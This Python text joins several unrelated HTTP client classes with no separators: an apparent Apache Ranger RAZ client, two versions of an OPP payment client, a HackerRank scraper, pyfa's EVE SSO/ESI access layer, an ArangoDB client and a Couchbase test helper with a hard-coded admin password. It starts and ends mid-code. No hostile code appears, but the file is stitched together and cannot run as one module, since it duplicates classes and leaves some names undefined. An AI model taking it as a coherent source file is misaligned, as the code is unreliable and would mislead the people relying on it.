            response = self.session.post(path, **params)
        elif api.method == HttpMethod.PUT:
            response = self.session.put(path, **params)
        elif api.method == HttpMethod.DELETE:
            response = self.session.delete(path, **params)
        if LOG.isEnabledFor(logging.DEBUG):
            LOG.debug("HTTP Status: %s",
                      response.status_code if response else "None")
        if response is None:
            ret = None
        elif response.status_code == api.expected_status:
            try:
                if response.content is not None:
                    if LOG.isEnabledFor(logging.DEBUG):
                        LOG.debug("<== __call_api(%s, %s, %s), result=%s",
                                  vars(api), params, request_data, response)
                        LOG.debug(response.json())
                    ret = response.json()
                else:
                    ret = None
            except Exception as e:
                # Cleanup: the stray print(e) was removed — LOG.exception
                # already records the error with its traceback.
                LOG.exception(
                    "Exception occurred while parsing response with msg: %s",
                    e)
                raise RangerRazException(api, response)
        elif response.status_code == HTTPStatus.SERVICE_UNAVAILABLE:
            LOG.error("Ranger Raz server unavailable. HTTP Status: %s",
                      HTTPStatus.SERVICE_UNAVAILABLE)
            ret = None
        else:
            raise RangerRazException(api, response)
        return ret

    # URIs
    PARAM_OP = "op"
    PARAM_RENEWER = "renewer"
    PARAM_TOKEN = "token"
    PARAM_DELEGATION = "delegation"
    PARAM_DOAS = "doAs"
    PARAM_DT_SERVICENAME = "service"

    OP_GETDELEGATIONTOKEN = "GETDELEGATIONTOKEN"
    OP_RENEWDELEGATIONTOKEN = "RENEWDELEGATIONTOKEN"
    OP_CANCELDELEGATIONTOKEN = "CANCELDELEGATIONTOKEN"

    URI_DELEGATION_TOKEN = ""
    URI_CHECK_PRIVILEGE = "api/authz/{serviceType}/access"
    URI_CHECK_PRIVILEGES = "api/authz/{serviceType}/accesses"

    # APIs
    GET_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.GET,
                               HTTPStatus.OK)
    RENEW_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.PUT,
                                 HTTPStatus.OK)
    CANCEL_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.PUT,
                                  HTTPStatus.OK)
    CHECK_PRIVILEGE = API(URI_CHECK_PRIVILEGE, HttpMethod.POST, HTTPStatus.OK)
    CHECK_PRIVILEGES = API(URI_CHECK_PRIVILEGES, HttpMethod.POST,
                           HTTPStatus.OK)
class HTTPClient(object):
    """Thin wrapper around requests.Session for the OPP REST API.

    Dispatches GET/POST/PUT/DELETE requests, injects auth and test-mode
    parameters, and normalizes JSON responses.  The last raw response is
    kept on ``self.response`` (captured by a response hook) so that error
    paths can report its content and status code.
    """

    def __init__(self, base_url, auth_params, headers=None):
        """Initialize a new opp connection. Requires user name and password."""
        logger.debug(
            "START: OPP API connection with BASE_URL: {0}".format(base_url))
        self.base_url = base_url
        self.session = Session()
        self.session.verify = opp.config.config.ssl_verify
        self.auth_params = auth_params
        self.headers = headers
        # Dispatch table mapping HTTP verb names to bound handlers
        self.operations = dict(GET=self.get,
                               POST=self.post,
                               PUT=self.put,
                               DELETE=self.delete)
        # for internal usage: last raw response seen by the request hook
        self.response = None

    def __call__(self, request_type, params, url, return_type):
        """Dispatch a request of *request_type* ('GET'/'POST'/'PUT'/'DELETE').

        :param request_type: HTTP verb name used to select the handler
        :param params: request parameters (mutated: auth/test-mode added)
        :param url: path appended to base_url
        :param return_type: passed through to the response checker
        :return: parsed response payload
        :raise ValueError: when the response is missing/invalid JSON
        """
        if request_type == 'POST':
            # Tag POSTs with the plugin identifier expected by the API
            params.update({"customParameters[SHOPPER_pluginId]": "Python"})
        if opp.config.config.mode == opp.config.TEST_INTERNAL:
            params.update({"testMode": "INTERNAL"})
        if opp.config.config.mode == opp.config.TEST_EXTERNAL:
            params.update({"testMode": "EXTERNAL"})
        if self.auth_params:
            params.update(self.auth_params)
        try:
            result = self.operations[request_type](params,
                                                   url,
                                                   return_type,
                                                   headers=self.headers)
            logger.debug("SUCCESS: {0} {1}".format(request_type, url))
            return result
        except ValueError:
            # JSON encoding failed
            logger.debug("ERROR: {0} {1}".format(request_type, url))
            if self.response is not None:
                raise ValueError(self.response.content,
                                 self.response.status_code)
            # Bug fix: previously `raise ValueError()` discarded the
            # original decode error; re-raise it instead (it is itself a
            # ValueError subclass, so callers catching ValueError still work).
            raise

    def put(self, params, url, return_type, headers=None):
        """Issue a PUT; *params* are sent form-encoded in the request body.

        :return: checked, parsed response payload
        """
        return self._check_response(
            self.session.put(self.base_url + url,
                             params,
                             timeout=opp.config.config.request_timeout,
                             hooks=dict(response=self._request_callback),
                             headers=headers).json(), return_type)

    def post(self, params, url, return_type, headers=None):
        """Issue a POST; *params* are sent form-encoded in the request body.

        :return: checked, parsed response payload
        """
        # Cleanup: local was named `json`, shadowing the json module name
        payload = self.session.post(self.base_url + url,
                                    params,
                                    timeout=opp.config.config.request_timeout,
                                    hooks=dict(response=self._request_callback),
                                    headers=headers).json()
        return self._check_response(payload, return_type)

    def delete(self, params, url, return_type, headers=None):
        """Issue a DELETE; *params* are sent as query parameters.

        :return: checked, parsed response payload
        """
        return self._check_response(
            self.session.delete(self.base_url + url,
                                params=params,
                                timeout=opp.config.config.request_timeout,
                                hooks=dict(response=self._request_callback),
                                headers=headers).json(), return_type)

    def get(self, params, url, return_type, headers=None):
        """Issue a GET; *params* are sent as query parameters.

        :return: checked, parsed response payload
        """
        return self._check_response(
            self.session.get(self.base_url + url,
                             params=params,
                             timeout=opp.config.config.request_timeout,
                             hooks=dict(response=self._request_callback),
                             headers=headers).json(), return_type)

    def _request_callback(self, r, *args, **kwargs):
        """Response hook: remember the raw response for error reporting."""
        self.response = r

    def _check_response(self, json_data, return_type):
        """Normalize a truthy JSON payload to dict/list/str.

        :raise ValueError: with the raw content and status code when the
            payload is falsy (treated as an API error)
        """
        if json_data:
            # success
            if isinstance(json_data, dict):
                return dict(json_data)
            elif isinstance(json_data, list):
                return list(json_data)
            else:
                return str(json_data)
        else:
            # error
            raise ValueError(json_data, self.response.status_code)
class HRClient():
    """Authenticated HackerRank web-API client.

    Wraps a requests.Session whose response hook (addArgsToHook with
    logAndValidate/getCsrf) logs each response and keeps the CSRF token
    flowing between requests.  Usable as a context manager: logs in on
    construction and out on exit.

    NOTE(review): HR, HR_REST, CONTESTS, SUBMISSIONS, CHALLENGES and
    addArgsToHook/logAndValidate/getCsrf are module-level names defined
    elsewhere in this file.
    """

    def __init__(self, username, password):
        # Session with a response hook that logs/validates and captures CSRF
        self.session = Session()
        self.session.hooks['response'].append(
            addArgsToHook(logAndValidate, getCsrf, session=self.session))
        self.login(username, password)

    def __enter__(self):
        return self

    def __exit__(self, *args):
        # Always log out when leaving the context
        self.logout()

    # added dummy timeout argument to not skip CSRF passing
    def login(self, username, password):
        """Prime the session (dashboard GET fetches a CSRF token), then log in."""
        self.session.get(HR + '/dashboard', timeout=120)
        data = {
            'login': username,
            'password': password,
            'remember_me': False,
        }
        self.session.post(HR + '/auth/login', json=data, timeout=120)

    # added dummy timeout argument to not skip CSRF passing
    def logout(self):
        """End the session server-side; returns the DELETE response."""
        return self.session.delete(HR + '/auth/logout', timeout=120)

    # added dummy timeout argument to not skip CSRF passing
    def getUserModel(self):
        """Return the logged-in user's model from the master contest."""
        url = HR_REST + CONTESTS + '/master/hackers/me'
        # NOTE(review): local name `json` shadows the json module here
        json = {"updated_modal_profiled_data": {"updated": True}}
        hooks = {'response': addArgsToHook(logAndValidate, getCsrf,
                                           session=self.session)}
        return self.session.put(url, json=json, hooks=hooks).json()['model']

    # TODO add validation and sanity checks on model counts
    def getNewModels(self, models):
        """Fetch contest/submission/challenge models not already in *models*.

        :param models: previously-fetched data keyed by contest slug (or a
            falsy value for "nothing cached yet")
        :return: dict of new data keyed by contest slug; each value has
            'model', 'submissions' and 'challenges' entries
        """
        if not models:
            models = {}
        contests = {}
        url = HR_REST + '/hackers/me/myrank_contests'
        # Always include 'master' plus any recently ranked contests
        contestSlugs = {'master'} | {c['slug']
                                     for c in self.getModels(url, type='recent')}
        for slug in contestSlugs:
            url = HR_REST + CONTESTS + '/' + slug
            # get submission info, not models
            submissionIds = {s['id'] for s in self.getModels(url + SUBMISSIONS)}
            if slug in models and 'submissions' in models[slug]:
                # Drop submissions we already hold
                submissionIds -= models[slug]['submissions'].keys()
            # break out early if contest is already represented
            # TODO break each of these separate processes into separate functions and do sequentially
            if not submissionIds:
                continue
            # TODO is this necessary? does every challenge have an id?
            # get challenge info, not models
            challengeIds = {c['id'] for c in self.getModels(url + CHALLENGES)}
            if slug in models and 'challenges' in models[slug]:
                challengeIds -= models[slug]['challenges'].keys()
            # uncomment if only want challenge data for challenges attempted or with accompanying submissions
            #challengeSlugs = {sub['challenge_slug'] for sub in submissions.values()}
            #challengeIds = {sub['challenge_id'] for sub in submissions.values()}
            # begin creation of contest
            contest = {}
            contest['model'] = self.session.get(url).json()['model']
            contest['submissions'] = self.getModelsKeyed(url + SUBMISSIONS,
                                                         submissionIds)
            contest['challenges'] = self.getModelsKeyed(url + CHALLENGES,
                                                        challengeIds)
            contests[slug] = contest
        return contests

    def getModelsKeyed(self, url, ids):
        """Fetch one model per id and return them keyed by id.

        Empty/falsy models are skipped.  The 'remaining' field tells the
        hook how many requests are left — presumably for logging/progress;
        confirm against the hook implementation.
        """
        models = {}
        total = len(ids)
        for curr, i in enumerate(ids):
            model = self.session.get(url + '/' + str(i),
                                     data={'remaining': total - curr - 1}
                                     ).json()['model']
            if not model:
                continue
            models[i] = model
        return models

    # get all models from particular GET request
    # NOTE must make two calls because order is sometimes not preserved between requests
    def getModels(self, url, **params):
        """Return the full list of models for a paginated GET endpoint."""
        r = self.session.get(url, params=params).json()
        count = len(r['models'])
        total = r['total']
        # return models if all have been acquired
        if count >= total:
            return r['models']
        # Otherwise re-request with an explicit limit covering everything
        params['limit'] = total
        return self.session.get(url, params=params).json()['models']
class EsiAccess(object):
    """Low-level EVE ESI/SSO access layer for pyfa.

    Owns the shared requests Session (JSON headers, user agent, proxies) and
    implements the OAuth flows: in AUTO SSO mode the token exchange is proxied
    through pyfa.io; in CUSTOM mode it talks to login.eveonline.com directly
    using the locally configured client id/secret.
    """

    def __init__(self):
        self.settings = EsiSettings.getInstance()

        # session request stuff
        self._session = Session()
        self._session.headers.update({
            'Accept': 'application/json',
            'User-Agent': (
                'pyfa v{}'.format(config.version)
            )
        })
        self._session.proxies = NetworkSettings.getInstance().getProxySettingsInRequestsFormat()

    @property
    def sso_url(self):
        # CUSTOM mode talks to CCP's SSO directly; AUTO mode goes through pyfa.io.
        if self.settings.get("ssoMode") == SsoMode.CUSTOM:
            return "https://login.eveonline.com"
        return "https://www.pyfa.io"

    @property
    def esi_url(self):
        return "https://esi.tech.ccp.is"

    @property
    def oauth_verify(self):
        return '%s/verify/' % self.esi_url

    @property
    def oauth_authorize(self):
        return '%s/oauth/authorize' % self.sso_url

    @property
    def oauth_token(self):
        return '%s/oauth/token' % self.sso_url

    def getSkills(self, char):
        """GET the character's skills."""
        return self.get(char, ESIEndpoints.CHAR_SKILLS, character_id=char.characterID)

    def getSecStatus(self, char):
        """GET the character's public info (includes security status)."""
        return self.get(char, ESIEndpoints.CHAR, character_id=char.characterID)

    def getFittings(self, char):
        """GET the character's saved fittings."""
        return self.get(char, ESIEndpoints.CHAR_FITTINGS, character_id=char.characterID)

    def postFitting(self, char, json_str):
        # @todo: new fitting ID can be recovered from resp.data,
        return self.post(char, ESIEndpoints.CHAR_FITTINGS, json_str, character_id=char.characterID)

    def delFitting(self, char, fittingID):
        """DELETE a saved fitting by id."""
        return self.delete(char, ESIEndpoints.CHAR_DEL_FIT, character_id=char.characterID, fitting_id=fittingID)

    @staticmethod
    def update_token(char, tokenResponse):
        """ helper function to update token data from SSO response """
        char.accessToken = tokenResponse['access_token']
        # Expiry is stored as an absolute local datetime computed from expires_in.
        char.accessTokenExpires = datetime.datetime.fromtimestamp(time.time() + tokenResponse['expires_in'])
        if 'refresh_token' in tokenResponse:
            # Refresh token is persisted encrypted.
            char.refreshToken = config.cipher.encrypt(tokenResponse['refresh_token'].encode())

    def getLoginURI(self, redirect=None):
        """Build the SSO login URL; also generates a fresh CSRF ``state`` value."""
        self.state = str(uuid.uuid4())
        if self.settings.get("ssoMode") == SsoMode.AUTO:
            args = {
                'state': self.state,
                'pyfa_version': config.version,
                'login_method': self.settings.get('loginMode'),
                'client_hash': config.getClientSecret()
            }
            if redirect is not None:
                args['redirect'] = redirect
            return '%s?%s' % (
                self.oauth_authorize,
                urlencode(args)
            )
        else:
            # NOTE(review): ``scopes`` is a module-level name not visible here —
            # confirm it is defined at file scope before touching this branch.
            return '%s?response_type=%s&redirect_uri=%s&client_id=%s%s%s' % (
                self.oauth_authorize,
                'code',
                quote('http://localhost:6461', safe=''),
                self.settings.get('clientID'),
                '&scope=%s' % '+'.join(scopes) if scopes else '',
                '&state=%s' % self.state
            )

    def get_oauth_header(self, token):
        """ Return the Bearer Authorization header required in oauth calls
        :return: a dict with the authorization header
        """
        return {'Authorization': 'Bearer %s' % token}

    def get_refresh_token_params(self, refreshToken):
        """ Return the param object for the post() call to get the access_token
        from the refresh_token
        :param code: the refresh token
        :return: a dict with the url, params and header
        :raises AttributeError: if no refresh token is given
        """
        if refreshToken is None:
            raise AttributeError('No refresh token is defined.')

        data = {
            'grant_type': 'refresh_token',
            'refresh_token': refreshToken,
        }
        if self.settings.get('ssoMode') == SsoMode.AUTO:
            # data is all we really need, the rest is handled automatically by pyfa.io
            return {
                'data': data,
                'url': self.oauth_token,
            }
        # otherwise, we need to make the token with the client keys
        return self.__make_token_request_parameters(data)

    def __get_token_auth_header(self):
        """ Return the Basic Authorization header required to get the tokens
        :return: a dict with the headers
        """
        # encode/decode for py2/py3 compatibility
        auth_b64 = "%s:%s" % (self.settings.get('clientID'), self.settings.get('clientSecret'))
        auth_b64 = base64.b64encode(auth_b64.encode('latin-1'))
        auth_b64 = auth_b64.decode('latin-1')
        return {'Authorization': 'Basic %s' % auth_b64}

    def __make_token_request_parameters(self, params):
        """Bundle url, Basic-auth headers and form data into session.post() kwargs."""
        request_params = {
            'headers': self.__get_token_auth_header(),
            'data': params,
            'url': self.oauth_token,
        }
        return request_params

    def get_access_token_request_params(self, code):
        """Build the post() kwargs for exchanging an authorization code for tokens."""
        return self.__make_token_request_parameters(
            {
                'grant_type': 'authorization_code',
                'code': code,
            }
        )

    def auth(self, code):
        """Exchange an authorization code for a token response dict.

        NOTE(review): raises plain Exception here while refresh() raises
        APIException — inconsistent, but callers may depend on it.
        """
        request_data = self.get_access_token_request_params(code)
        res = self._session.post(**request_data)
        if res.status_code != 200:
            raise Exception(
                request_data['url'],
                res.status_code,
                res.json()
            )
        json_res = res.json()
        return json_res

    def refresh(self, ssoChar):
        """Refresh the character's access token and persist it via update_token()."""
        request_data = self.get_refresh_token_params(config.cipher.decrypt(ssoChar.refreshToken).decode())
        res = self._session.post(**request_data)
        if res.status_code != 200:
            raise APIException(
                request_data['url'],
                res.status_code,
                res.json()
            )
        json_res = res.json()
        self.update_token(ssoChar, json_res)
        return json_res

    def _before_request(self, ssoChar):
        # Refresh the token first if it has expired, then attach the Bearer header.
        if ssoChar.is_token_expired():
            pyfalog.info("Refreshing token for {}".format(ssoChar.characterName))
            self.refresh(ssoChar)
        if ssoChar.accessToken is not None:
            self._session.headers.update(self.get_oauth_header(ssoChar.accessToken))

    def _after_request(self, resp):
        # Surface ESI deprecation warnings and convert HTTP errors to APIException.
        if "warning" in resp.headers:
            pyfalog.warn("{} - {}".format(resp.headers["warning"], resp.url))
        if resp.status_code >= 400:
            raise APIException(
                resp.url,
                resp.status_code,
                resp.json()
            )
        return resp

    def get(self, ssoChar, endpoint, *args, **kwargs):
        """Authenticated GET; ``kwargs`` fill the endpoint template placeholders."""
        self._before_request(ssoChar)
        endpoint = endpoint.format(**kwargs)
        return self._after_request(self._session.get("{}{}".format(self.esi_url, endpoint)))

    def post(self, ssoChar, endpoint, json, *args, **kwargs):
        """Authenticated POST of a pre-serialized JSON body."""
        self._before_request(ssoChar)
        endpoint = endpoint.format(**kwargs)
        return self._after_request(self._session.post("{}{}".format(self.esi_url, endpoint), data=json))

    def delete(self, ssoChar, endpoint, *args, **kwargs):
        """Authenticated DELETE; ``kwargs`` fill the endpoint template placeholders."""
        self._before_request(ssoChar)
        endpoint = endpoint.format(**kwargs)
        return self._after_request(self._session.delete("{}{}".format(self.esi_url, endpoint)))
class DefaultClient(BaseClient):
    """Session based HTTP (default) client for ArangoDB.

    All verbs share one requests Session (created with the credentials from
    ``init_data``). Each method accepts an optional per-request ``auth``
    tuple; when it is None, requests falls back to the session-level auth.

    Fix: previously only ``delete`` forwarded the ``auth`` argument — every
    other verb accepted it and silently ignored it. All verbs now forward it.
    The repeated Response-building boilerplate is factored into
    ``_make_response``.
    """

    def __init__(self, init_data):
        """Initialize the session with the credentials.

        :param init_data: data for client initialization
        :type init_data: dict
        """
        self.session = Session()
        self.session.auth = init_data["auth"]

    @staticmethod
    def _make_response(method, url, res):
        """Convert a requests response into an ArangoDB Response object.

        :param method: lowercase HTTP verb name
        :type method: str
        :param url: request URL
        :type url: str
        :param res: the raw requests response
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        return Response(
            method=method,
            url=url,
            headers=res.headers,
            status_code=res.status_code,
            content=res.text,
            status_text=res.reason
        )

    def head(self, url, params=None, headers=None, auth=None):
        """HTTP HEAD method.

        :param url: request URL
        :type url: str
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        res = self.session.head(
            url=url,
            params=params,
            headers=headers,
            auth=auth,
        )
        return self._make_response("head", url, res)

    def get(self, url, params=None, headers=None, auth=None):
        """HTTP GET method.

        :param url: request URL
        :type url: str
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        res = self.session.get(
            url=url,
            params=params,
            headers=headers,
            auth=auth,
        )
        return self._make_response("get", url, res)

    def put(self, url, data=None, params=None, headers=None, auth=None):
        """HTTP PUT method.

        :param url: request URL
        :type url: str
        :param data: request payload
        :type data: str or dict or None
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        res = self.session.put(
            url=url,
            data=data,
            params=params,
            headers=headers,
            auth=auth,
        )
        return self._make_response("put", url, res)

    def post(self, url, data=None, params=None, headers=None, auth=None):
        """HTTP POST method.

        :param url: request URL
        :type url: str
        :param data: request payload
        :type data: str or dict or None
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        # None is coerced to ""/{} here (original behavior, kept as-is).
        res = self.session.post(
            url=url,
            data="" if data is None else data,
            params={} if params is None else params,
            headers={} if headers is None else headers,
            auth=auth,
        )
        return self._make_response("post", url, res)

    def patch(self, url, data=None, params=None, headers=None, auth=None):
        """HTTP PATCH method.

        :param url: request URL
        :type url: str
        :param data: request payload
        :type data: str or dict or None
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        res = self.session.patch(
            url=url,
            data=data,
            params=params,
            headers=headers,
            auth=auth,
        )
        return self._make_response("patch", url, res)

    def delete(self, url, params=None, headers=None, auth=None):
        """HTTP DELETE method.

        :param url: request URL
        :type url: str
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        res = self.session.delete(
            url=url,
            params=params,
            headers=headers,
            auth=auth,
        )
        return self._make_response("delete", url, res)

    def options(self, url, data=None, params=None, headers=None, auth=None):
        """HTTP OPTIONS method.

        :param url: request URL
        :type url: str
        :param data: request payload
        :type data: str or dict or None
        :param params: request parameters
        :type params: dict or None
        :param headers: request headers
        :type headers: dict or None
        :param auth: username and password tuple
        :type auth: tuple or None
        :returns: ArangoDB http response object
        :rtype: arango.response.Response
        """
        # None is coerced to ""/{} here (original behavior, kept as-is).
        res = self.session.options(
            url=url,
            data="" if data is None else data,
            params={} if params is None else params,
            headers={} if headers is None else headers,
            auth=auth,
        )
        return self._make_response("options", url, res)

    def close(self):
        """Close the HTTP session."""
        self.session.close()
class HTTPClient(object):
    """HTTP transport for the OPP payment API.

    Dispatches GET/POST/PUT/DELETE through one requests Session, records the
    last raw response via a hook (for error reporting), and normalizes JSON
    bodies through ``_check_response``.

    Fix: on a JSON decode failure with no captured response, the original
    code raised a brand-new, argument-less ``ValueError()``, discarding the
    original message and traceback; a bare ``raise`` now re-raises the
    original error instead (still a ValueError, so callers are unaffected).
    """

    def __init__(self, base_url, auth_params):
        """Initialize a new opp connection. Requires user name and password.

        :param base_url: API root every relative ``url`` is appended to
        :param auth_params: credential dict merged into every request's params
        """
        logger.debug("START: OPP API connection with BASE_URL: {0}".format(base_url))
        self.base_url = base_url
        self.session = Session()
        self.session.verify = opp.config.config.ssl_verify
        self.auth_params = auth_params
        # Verb-name -> bound method dispatch table.
        self.operations = dict(GET=self.get, POST=self.post, PUT=self.put,
                               DELETE=self.delete)
        # for internal usage: last raw response captured by _request_callback
        self.response = None

    def __call__(self, request_type, params, url, return_type):
        """Dispatch a request, injecting plugin/test-mode/auth parameters.

        :param request_type: one of 'GET', 'POST', 'PUT', 'DELETE'
        :param params: mutable dict of request parameters (mutated in place)
        :param url: path relative to base_url
        :param return_type: forwarded to the verb handler
        :return: the parsed response payload
        :raise ValueError: when the response body is not valid JSON
        """
        if request_type == 'POST':
            params.update({"customParameters[SHOPPER_pluginId]": "Python"})
        if opp.config.config.mode == opp.config.TEST_INTERNAL:
            params.update({"testMode": "INTERNAL"})
        if opp.config.config.mode == opp.config.TEST_EXTERNAL:
            params.update({"testMode": "EXTERNAL"})
        if self.auth_params:
            params.update(self.auth_params)
        try:
            result = self.operations[request_type](params, url, return_type)
            logger.debug("SUCCESS: {0} {1}".format(request_type, url))
            return result
        except ValueError:
            # JSON encoding failed
            logger.debug("ERROR: {0} {1}".format(request_type, url))
            if self.response is not None:
                # Replace with the server's raw body + status for context.
                raise ValueError(self.response.content, self.response.status_code)
            # No response captured: propagate the original error untouched.
            raise

    def put(self, params, url, return_type):
        """PUT ``params`` as the request body and parse the JSON reply.

        :param params: request payload
        :param url: path relative to base_url
        :param return_type: forwarded to _check_response
        :return: normalized payload
        """
        return self._check_response(
            self.session.put(self.base_url + url, params,
                             timeout=opp.config.config.request_timeout,
                             hooks=dict(response=self._request_callback),
                             ).json(),
            return_type)

    def post(self, params, url, return_type):
        """POST ``params`` as the request body and parse the JSON reply.

        :param params: request payload
        :param url: path relative to base_url
        :param return_type: forwarded to _check_response
        :return: normalized payload
        """
        json = self.session.post(self.base_url + url, params,
                                 timeout=opp.config.config.request_timeout,
                                 hooks=dict(response=self._request_callback)).json()
        return self._check_response(json, return_type)

    def delete(self, params, url, return_type):
        """DELETE with ``params`` in the query string and parse the JSON reply.

        :param params: query parameters
        :param url: path relative to base_url
        :param return_type: forwarded to _check_response
        :return: normalized payload
        """
        return self._check_response(
            self.session.delete(self.base_url + url,
                                params=params,
                                timeout=opp.config.config.request_timeout,
                                hooks=dict(response=self._request_callback)).json(),
            return_type)

    def get(self, params, url, return_type):
        """GET with ``params`` in the query string and parse the JSON reply.

        :param params: query parameters
        :param url: path relative to base_url
        :param return_type: forwarded to _check_response
        :return: normalized payload
        """
        return self._check_response(
            self.session.get(self.base_url + url,
                             params=params,
                             timeout=opp.config.config.request_timeout,
                             hooks=dict(response=self._request_callback)).json(),
            return_type)

    def _request_callback(self, r, *args, **kwargs):
        """requests response hook: remember the last raw response for error reporting."""
        self.response = r

    def _check_response(self, json_data, return_type):
        """Normalize a decoded JSON payload, or raise on an empty/falsy one.

        :param json_data: decoded response body
        :param return_type: currently unused; kept for interface compatibility
        :return: dict, list or str copy of the payload
        :raise ValueError: when the payload is empty/falsy
        """
        if json_data:
            # success: return a shallow copy in the payload's own shape
            if isinstance(json_data, dict):
                return dict(json_data)
            elif isinstance(json_data, list):
                return list(json_data)
            else:
                return str(json_data)
        else:
            # error
            raise ValueError(json_data, self.response.status_code)
class CouchbaseServer:
    """ Installs Couchbase Server on machine host

    Drives one Couchbase Server node over its :8091 REST API (admin session
    Administrator/password) plus SSH (``RemoteExecutor``) for service
    start/stop. Bucket data access goes through the ``Bucket`` SDK client.
    """

    def __init__(self, url):
        # url: e.g. "http://host:8091"; host is derived by stripping scheme/port
        self.url = url
        # Strip http prefix and port to store host
        host = self.url.replace("http://", "")
        host = host.replace(":8091", "")
        self.host = host
        self.remote_executor = RemoteExecutor(self.host)
        self._session = Session()
        self._session.auth = ("Administrator", "password")

    def delete_buckets(self):
        """Delete every bucket on the node, retrying the whole pass up to 3 times."""
        count = 0
        while count < 3:
            resp = self._session.get("{}/pools/default/buckets".format(self.url))
            log_r(resp)
            resp.raise_for_status()
            obj = json.loads(resp.text)
            existing_bucket_names = []
            for entry in obj:
                existing_bucket_names.append(entry["name"])
            log_info("Existing buckets: {}".format(existing_bucket_names))
            log_info("Deleting buckets: {}".format(existing_bucket_names))
            # HACK around Couchbase Server issue where issuing a bucket delete via REST occasionally returns 500 error
            delete_num = 0
            # Delete existing buckets
            for bucket_name in existing_bucket_names:
                resp = self._session.delete("{0}/pools/default/buckets/{1}".format(self.url, bucket_name))
                log_r(resp)
                if resp.status_code == 200:
                    delete_num += 1
            if delete_num == len(existing_bucket_names):
                # All deletes succeeded (also true when there were no buckets).
                break
            else:
                # A 500 error may have occured, query for buckets and try to delete them again
                time.sleep(5)
                count += 1
        # Check that max retries did not occur
        if count == 3:
            # NOTE(review): message says "bucket creation" but this is deletion.
            raise CBServerError("Max retries for bucket creation hit. Could not delete buckets!")

    def wait_for_ready_state(self):
        """ Verify all server node is in are in a "healthy" state to avoid sync_gateway startup failures
        Work around for this - https://github.com/couchbase/sync_gateway/issues/1745
        """
        start = time.time()
        while True:
            if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT:
                # NOTE(review): message looks copy-pasted from a doc-verification helper.
                raise Exception("Verify Docs Present: TIMEOUT")
            # Verfy the server is in a "healthy", not "warmup" state
            try:
                resp = self._session.get("{}/pools/nodes".format(self.url))
                log_r(resp)
            except ConnectionError:
                # If bringing a server online, there may be some connnection issues.
                # Continue and try again.
                time.sleep(1)
                continue
            resp_obj = resp.json()
            all_nodes_healthy = True
            for node in resp_obj["nodes"]:
                if node["status"] != "healthy":
                    all_nodes_healthy = False
                    log_info("Node is still not healthy. Status: {} Retrying ...".format(node["status"]))
                    time.sleep(1)
            if not all_nodes_healthy:
                continue
            log_info("All nodes are healthy")
            log_debug(resp_obj)
            # All nodes are heathy if it made it to here
            break

    def get_available_ram(self):
        """ Call the Couchbase REST API to get the total memory available on the machine """
        resp = self._session.get("{}/pools/default".format(self.url))
        resp.raise_for_status()
        resp_json = resp.json()

        # Workaround for https://github.com/couchbaselabs/mobile-testkit/issues/709
        # where some node report mem_total = 0. Loop over all the nodes and find highest val
        mem_total_highest = 0
        for node in resp_json["nodes"]:
            mem_total = node["systemStats"]["mem_total"]
            if mem_total > mem_total_highest:
                mem_total_highest = mem_total
        return mem_total_highest

    def create_buckets(self, bucket_names):
        """
        # Figure out what total ram available is
        # Divide by number of buckets
        """
        if len(bucket_names) == 0:
            return
        log_info("Creating buckets: {}".format(bucket_names))

        # 80% of RAM is usable; 512 MB is reserved for the N1QL indexer.
        ram_multiplier = 0.80
        total_avail_ram_bytes = self.get_available_ram()
        total_avail_ram_mb = int(total_avail_ram_bytes / (1024 * 1024))
        n1ql_indexer_ram_mb = 512
        effective_avail_ram_mb = int(total_avail_ram_mb * ram_multiplier) - n1ql_indexer_ram_mb
        per_bucket_ram_mb = int(effective_avail_ram_mb / len(bucket_names))
        log_info("total_avail_ram_mb: {} effective_avail_ram_mb: {} effective_avail_ram_mb: {}".format(total_avail_ram_mb, effective_avail_ram_mb, effective_avail_ram_mb))

        for bucket_name in bucket_names:
            log_info("Create bucket {} with per_bucket_ram_mb {}".format(bucket_name, per_bucket_ram_mb))
            self.create_bucket(bucket_name, per_bucket_ram_mb)

    def create_bucket(self, name, ramQuotaMB=1024):
        """
        1. Create CBS bucket via REST
        2. Create client connection and poll until bucket is available
           Catch all connection exception and break when KeyNotFound error is thrown
        3. Verify all server nodes are in a 'healthy' state before proceeding

        Followed the docs below that suggested this approach.
        http://docs.couchbase.com/admin/admin/REST/rest-bucket-create.html
        """
        log_info("Creating bucket {} with RAM {}".format(name, ramQuotaMB))

        data = {
            "name": name,
            "ramQuotaMB": str(ramQuotaMB),
            "authType": "sasl",
            "proxyPort": "11211",
            "bucketType": "couchbase",
            "flushEnabled": "1"
        }

        resp = self._session.post("{}/pools/default/buckets".format(self.url), data=data)
        log_r(resp)
        resp.raise_for_status()

        # Create client an retry until KeyNotFound error is thrown
        start = time.time()
        while True:
            if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT:
                raise Exception("TIMEOUT while trying to create server buckets.")
            try:
                bucket = Bucket("couchbase://{}/{}".format(self.host, name))
                # A NotFoundError on a random key means the bucket is up and serving.
                bucket.get('foo')
            except ProtocolError:
                log_info("Client Connection failed: Retrying ...")
                time.sleep(1)
                continue
            except TemporaryFailError:
                log_info("Failure from server: Retrying ...")
                time.sleep(1)
                continue
            except NotFoundError:
